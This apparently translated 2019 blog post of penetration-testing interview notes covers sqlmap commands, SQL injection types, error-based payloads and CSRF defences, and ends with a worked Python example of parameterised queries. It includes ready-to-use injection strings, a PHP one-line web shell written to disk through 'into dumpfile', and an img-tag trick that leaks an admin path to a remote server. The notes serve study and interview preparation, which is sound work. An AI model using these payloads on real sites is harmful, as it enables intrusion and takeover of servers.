Knowledge points related to penetration testing, such as sqlmap injection, nmap scanning modes, SQL injection types, SQL injection protection methods, etc.

First, sqlmap: how do you test an injection point?

1) If the parameter is sent by GET, run sqlmap on the URL directly: sqlmap -u "<URL containing the injection point>"
2) If the parameter is sent by POST, add the --data option: sqlmap -u "<injection point URL>" --data="<POST body>"
3) If the injection point is in a cookie, the X-Forwarded-For header or similar, capture the request with Burp Suite, replace the injected value with an asterisk (*), save the request to a file, and run sqlmap -r "<file path>"

Second, nmap: several scanning modes

Reference 1:

Reference 2:

Third, how many types of SQL injection are there?

1) Error-based injection
2) Boolean-based injection
3) Time-based (delayed) injection
4) Wide-byte injection

Fourth, which functions can be used for error-based injection? (10)

1) extractvalue(): and extractvalue(1, concat(0x7e,(select @@version),0x7e))
2) floor(): trigger the error through floor()
3) updatexml(): and updatexml(1, concat(0x7e,(select @@version),0x7e),1)
4) geometrycollection(): select * from test where id=1 and geometrycollection((select * from(select * from(select user())a)b));
5) multipoint(): select * from test where id=1 and multipoint((select * from(select * from(select user())a)b));
6) polygon(): select * from test where id=1 and polygon((select * from(select * from(select user())a)b));
7) multipolygon(): select * from test where id=1 and multipolygon((select * from(select * from(select user())a)b));
8) linestring(): select * from test where id=1 and linestring((select * from(select * from(select user())a)b));
9) multilinestring(): select * from test where id=1 and multilinestring((select * from(select * from(select user())a)b));
10) exp(): select * from test where id=1 and exp(~(select * from(select user())a));

Fifth, how do you detect time-based (delayed) injection?

Use a conditional sleep, for example:
if(ascii(substr("hello", 1, 1))=104, sleep(5), 1)

Sixth, what do boolean blind injection and time-based injection have in common?

Both determine the result one character at a time.

Seventh, how is a web shell obtained on a website?

File upload, editing templates in the back end, writing a file through SQL injection, command execution, code execution,
and published CMS vulnerabilities, for example the DedeCMS back end can create script files directly, and the WordPress plugin upload accepts a zip archive containing script files, etc.

Eighth, which SQL statements write files through SQL injection?

select '<one-line shell>' into outfile '<path>'
select '<one-line shell>' into dumpfile '<path>'
select '<?php eval($_POST[1]) ?>' into dumpfile 'd:\\wwwroot\\nvhack.php';

Ninth, how do you prevent CSRF?

1. Verify the Referer header
2. Verify a token

Tenth, what are the OWASP Top 10 vulnerabilities?

1. Injection
2. Broken authentication and session management
3. Cross-site scripting (XSS)
4. Insecure direct object references
5. Security misconfiguration
6. Sensitive data exposure
7. Missing function-level access control
8. Cross-site request forgery (CSRF)
9. Using components with known vulnerabilities
10. Unvalidated redirects and forwards

Eleventh, what are the SQL injection protection methods?

1. Use a safe API
2. Escape special characters in input
3. Use a whitelist to validate input in a standardized way
4. Control client-side input and disallow special characters related to SQL
5. Before submitting the SQL query to the database, the server filters, escapes, replaces or deletes special characters.
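As an added worked example (not from the original post), the following Python code uses an in-memory SQLite table named test, constructed here with sample rows, to contrast item 5 done by string concatenation, item 2 applied on its own to an unquoted numeric parameter, and items 1 and 3 combined: whitelist validation followed by a parameterised query.

```python
import re
import sqlite3

def make_db():
    """Constructed in-memory stand-in for the page's 'test' table (sample data only)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("create table test (id integer primary key, name text)")
    conn.executemany("insert into test values (?, ?)",
                     [(1, "alice"), (2, "bob"), (3, "carol")])
    return conn

def lookup_concat(conn, user_id):
    """Item 5 done wrong: raw input is spliced into the statement, so
    '2 or 1=1' rewrites the WHERE clause and returns every row."""
    sql = "select name from test where id=" + user_id
    return [row[0] for row in conn.execute(sql)]

def lookup_escaped(conn, user_id):
    """Item 2 on its own: doubling single quotes protects a quoted string
    literal, but id is an unquoted number, so a payload containing no
    quote at all ('2 or 1=1') passes through untouched and still injects."""
    sql = "select name from test where id=" + user_id.replace("'", "''")
    return [row[0] for row in conn.execute(sql)]

# Item 3: whitelist, the id must be a plain positive integer and nothing else.
ID_RE = re.compile(r"[1-9][0-9]{0,9}")

def is_valid_id(user_id):
    return ID_RE.fullmatch(user_id) is not None

def lookup_safe(conn, user_id):
    """Items 1 and 3 together: reject anything outside the whitelist, then
    bind the value with a parameterised query so the driver passes it as
    data and it can never change the statement's structure."""
    if not is_valid_id(user_id):
        raise ValueError("rejected id: %r" % (user_id,))
    rows = conn.execute("select name from test where id=?", (int(user_id),))
    return [row[0] for row in rows]

if __name__ == "__main__":
    db = make_db()
    payload = "2 or 1=1"
    print("concat :", lookup_concat(db, payload))    # every row leaks
    print("escaped:", lookup_escaped(db, payload))   # still every row
    print("safe   :", is_valid_id(payload), lookup_safe(db, "2"))
```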

Twelfth, which functions perform code execution, file reading and command execution?

1. Code execution: eval, preg_replace with the /e modifier, assert, call_user_func, call_user_func_array, create_function
2. File reading: file_get_contents(), highlight_file(), fopen(), readfile(), fread(), fgetss(), fgets(), parse_ini_file(), show_source(), file(), etc.
3. Command execution: system(), exec(), shell_exec(), passthru(), pcntl_exec(), popen(), proc_open()

Thirteenth, besides the onerror attribute, is there another way for an img tag to obtain the administrator's path?

Point src at a remote script file, which reads the Referer header.

Fourteenth, if the onerror attribute cannot be used and the src attribute must end in .jpg, how can the administrator path be obtained?

1. On the remote server, modify the Apache configuration so that .jpg files are parsed as PHP:
AddType application/x-httpd-php .jpg
The .jpg referenced by <img src= > will then be parsed as PHP.

Tags: SQL PHP Attribute ascii

Posted on Tue, 03 Sep 2019 03:18:37 -0400 by musson